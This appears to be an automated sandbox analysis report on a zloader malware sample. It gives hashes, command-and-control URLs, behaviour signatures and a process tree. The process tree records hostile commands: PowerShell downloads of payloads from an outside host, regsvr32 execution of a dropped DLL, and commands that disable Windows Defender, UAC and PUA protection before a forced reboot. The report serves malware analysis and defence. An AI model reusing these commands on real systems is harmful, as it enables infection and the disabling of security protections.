Analysis
-
max time kernel
55s -
max time network
185s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
16-08-2021 17:59
Static task
static1
Behavioral task
behavioral1
Sample
8f87fe90d589a4fa73cff6a242fe222b.exe
Resource
win7v20210410
Errors
General
-
Target
8f87fe90d589a4fa73cff6a242fe222b.exe
-
Size
165KB
-
MD5
8f87fe90d589a4fa73cff6a242fe222b
-
SHA1
381e33872d0f6f1a7233beeb6e9524435c2a9ab6
-
SHA256
edaabcb2e82b51c9b8df54dc82afc494bff804b1b187c4657ab583e8ca0bd052
-
SHA512
f0ce6885ac47429df5a1a0779c9a455300d77284ef71ff1e344afe2344513b430705ce50d62fceddb051cb5df8b67e1c4969b377413647f4cbe23fc87351aca0
Malware Config
Extracted
zloader
ivan
ivan
https://iqowijsdakm.com/gate.php
https://wiewjdmkfjn.com/gate.php
https://dksaoidiakjd.com/gate.php
https://iweuiqjdakjd.com/gate.php
https://yuidskadjna.com/gate.php
https://olksmadnbdj.com/gate.php
https://odsakmdfnbs.com/gate.php
https://odsakjmdnhsaj.com/gate.php
https://odjdnhsaj.com/gate.php
https://odoishsaj.com/gate.php
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 1784 powershell.exe -
Downloads MZ/PE file
-
Loads dropped DLL 1 IoCs
Processes:
regsvr32.exepid process 1360 regsvr32.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
8f87fe90d589a4fa73cff6a242fe222b.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce 8f87fe90d589a4fa73cff6a242fe222b.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 8f87fe90d589a4fa73cff6a242fe222b.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 1756 timeout.exe 432 timeout.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
regsvr32.exepid process 1756 regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1784 powershell.exe 1784 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1784 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
8f87fe90d589a4fa73cff6a242fe222b.execmd.exeregsvr32.exedescription pid process target process PID 1856 wrote to memory of 1792 1856 8f87fe90d589a4fa73cff6a242fe222b.exe cmd.exe PID 1856 wrote to memory of 1792 1856 8f87fe90d589a4fa73cff6a242fe222b.exe cmd.exe PID 1856 wrote to memory of 1792 1856 8f87fe90d589a4fa73cff6a242fe222b.exe cmd.exe PID 1792 wrote to memory of 1784 1792 cmd.exe powershell.exe PID 1792 wrote to memory of 1784 1792 cmd.exe powershell.exe PID 1792 wrote to memory of 1784 1792 cmd.exe powershell.exe PID 1792 wrote to memory of 1756 1792 cmd.exe regsvr32.exe PID 1792 wrote to memory of 1756 1792 cmd.exe regsvr32.exe PID 1792 wrote to memory of 1756 1792 cmd.exe regsvr32.exe PID 1792 wrote to memory of 1756 1792 cmd.exe regsvr32.exe PID 1792 wrote to memory of 1756 1792 cmd.exe regsvr32.exe PID 1756 wrote to memory of 1360 1756 regsvr32.exe regsvr32.exe PID 1756 wrote to memory of 1360 1756 regsvr32.exe regsvr32.exe PID 1756 wrote to memory of 1360 1756 regsvr32.exe regsvr32.exe PID 1756 wrote to memory of 1360 1756 regsvr32.exe regsvr32.exe PID 1756 wrote to memory of 1360 1756 regsvr32.exe regsvr32.exe PID 1756 wrote to memory of 1360 1756 regsvr32.exe regsvr32.exe PID 1756 wrote to memory of 1360 1756 regsvr32.exe regsvr32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8f87fe90d589a4fa73cff6a242fe222b.exe"C:\Users\Admin\AppData\Local\Temp\8f87fe90d589a4fa73cff6a242fe222b.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\system32\cmd.execmd /c start.bat2⤵
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://pornotublovers.com/JavaP.dll -OutFile JavaP.dll3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784 -
C:\Windows\system32\regsvr32.exeregsvr32 JavaP.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\SysWOW64\regsvr32.exeJavaP.dll4⤵
- Loads dropped DLL
PID:1360 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe5⤵PID:1316
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://pornotublovers.com/nsudo.bat -OutFile nsudo.bat3⤵PID:1004
-
C:\Windows\system32\cmd.execmd /c nsudo.bat3⤵PID:1564
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"4⤵PID:1352
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://pornotublovers.com/javase.exe -OutFile javase.exe4⤵PID:1708
-
C:\Users\Admin\AppData\Roaming\javase.exejavase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f4⤵PID:2016
-
C:\Users\Admin\AppData\Roaming\javase.exejavase -U:T sc config WinDefend start= disabled4⤵PID:1504
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://pornotublovers.com/autorun100.bat -OutFile autorun100.bat4⤵PID:1884
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force4⤵PID:1196
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -PUAProtection disable"4⤵PID:1696
-
C:\Windows\system32\shutdown.exeshutdown.exe /r /f /t 004⤵PID:1340
-
C:\Windows\system32\timeout.exetimeout 163⤵
- Delays execution with timeout.exe
PID:1756 -
C:\Windows\system32\cmd.execmd /c nsudo.bat3⤵PID:1636
-
C:\Windows\system32\timeout.exetimeout 163⤵
- Delays execution with timeout.exe
PID:432
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵PID:1752
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x11⤵PID:1532
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5b309c0c76753aaced3d5b8eb63568afe
SHA1f70f227618b58acab4486f9165a51e4a09127679
SHA256ebdd19e23fcb2fdbef8fbb9e0e9cf1af2d7d4ba9fed51753f5a1245519510465
SHA512fa6ecc15a88d1b28cd00269d25e977033cab68c0259d15544109b0af81f2ab67d1765053a292906048696405fada08a8dad01cfbb8ceead86acef6dc0d7510fe
-
MD5
676d31dd4a8405ead757e0b72d6bd381
SHA1789a5fc1af78a0630ae705f6dd5506dd476d9d0f
SHA25657d69a6ca957beb5c9eed7f39d0bb56e6d3348bd510fbba10ad0c19438a712b7
SHA51279cc7bd42feb80d9a552f2fd6145795ab1904ca7c8d4175f70f9225b04eddcc7107ebf4391eac9d578ed7b963ce192df58050e73b8eaed30e3ef89405e18028c
-
MD5
23cb9715b98c53a8351d0cfb3d0a24eb
SHA14048470f92c65898b3e7186cc98108b74e4b2171
SHA256bf74dac2db3967e1d661db1bfdbee8fe546bd19ecdcef0baf6b61fb3f78a89d7
SHA5124b3753020e795b8ba96d292097633a837579aa3b5fa68f7b39f8d76ce3bf3cec6a43663526f9ae79283b4a9aa9034ab96605a554b035ff35f6e10a42bf3efdc1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5c9a3530b442299ad12821d3213974ba1
SHA132a63e7134a3d7c8c31d82f7729b715deb7b161d
SHA256cc1a0e59fd391d34d83fe8ece5e5726326919fcb8121cf53a6e91e4dd698e83a
SHA512b419184400e941d7a4e3b477b355c690bb3c6b42760a91600dc38944c80580f97e0bc80ed63d9d6ddd97400f76375e47fec22162c0d3f969ab8b85c5b12e8ec9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5c9a3530b442299ad12821d3213974ba1
SHA132a63e7134a3d7c8c31d82f7729b715deb7b161d
SHA256cc1a0e59fd391d34d83fe8ece5e5726326919fcb8121cf53a6e91e4dd698e83a
SHA512b419184400e941d7a4e3b477b355c690bb3c6b42760a91600dc38944c80580f97e0bc80ed63d9d6ddd97400f76375e47fec22162c0d3f969ab8b85c5b12e8ec9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5c9a3530b442299ad12821d3213974ba1
SHA132a63e7134a3d7c8c31d82f7729b715deb7b161d
SHA256cc1a0e59fd391d34d83fe8ece5e5726326919fcb8121cf53a6e91e4dd698e83a
SHA512b419184400e941d7a4e3b477b355c690bb3c6b42760a91600dc38944c80580f97e0bc80ed63d9d6ddd97400f76375e47fec22162c0d3f969ab8b85c5b12e8ec9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5c9a3530b442299ad12821d3213974ba1
SHA132a63e7134a3d7c8c31d82f7729b715deb7b161d
SHA256cc1a0e59fd391d34d83fe8ece5e5726326919fcb8121cf53a6e91e4dd698e83a
SHA512b419184400e941d7a4e3b477b355c690bb3c6b42760a91600dc38944c80580f97e0bc80ed63d9d6ddd97400f76375e47fec22162c0d3f969ab8b85c5b12e8ec9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5c9a3530b442299ad12821d3213974ba1
SHA132a63e7134a3d7c8c31d82f7729b715deb7b161d
SHA256cc1a0e59fd391d34d83fe8ece5e5726326919fcb8121cf53a6e91e4dd698e83a
SHA512b419184400e941d7a4e3b477b355c690bb3c6b42760a91600dc38944c80580f97e0bc80ed63d9d6ddd97400f76375e47fec22162c0d3f969ab8b85c5b12e8ec9
-
MD5
5cae01aea8ed390ce9bec17b6c1237e4
SHA13a80a49efaac5d839400e4fb8f803243fb39a513
SHA25619896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
SHA512c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481
-
MD5
5cae01aea8ed390ce9bec17b6c1237e4
SHA13a80a49efaac5d839400e4fb8f803243fb39a513
SHA25619896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
SHA512c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481
-
MD5
6f10d512d4cbb527fd26ae266d0a4aef
SHA16e42d51ff2d42c5f999943b329a655e901ea4b32
SHA256b37efaf69f5484fd2e4ec9c83553b9788e39a10fc4390065c29d59f770f34943
SHA5124f66e8435b8439ace551ad8a70483926891ff3f55b27688602b2e0c58999054bd430308879374f4e8c990a91c3e9cc9cd78b6d355d4370051528bce536e1028e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
23cb9715b98c53a8351d0cfb3d0a24eb
SHA14048470f92c65898b3e7186cc98108b74e4b2171
SHA256bf74dac2db3967e1d661db1bfdbee8fe546bd19ecdcef0baf6b61fb3f78a89d7
SHA5124b3753020e795b8ba96d292097633a837579aa3b5fa68f7b39f8d76ce3bf3cec6a43663526f9ae79283b4a9aa9034ab96605a554b035ff35f6e10a42bf3efdc1
-
MD5
5cae01aea8ed390ce9bec17b6c1237e4
SHA13a80a49efaac5d839400e4fb8f803243fb39a513
SHA25619896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
SHA512c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481
-
MD5
5cae01aea8ed390ce9bec17b6c1237e4
SHA13a80a49efaac5d839400e4fb8f803243fb39a513
SHA25619896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
SHA512c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481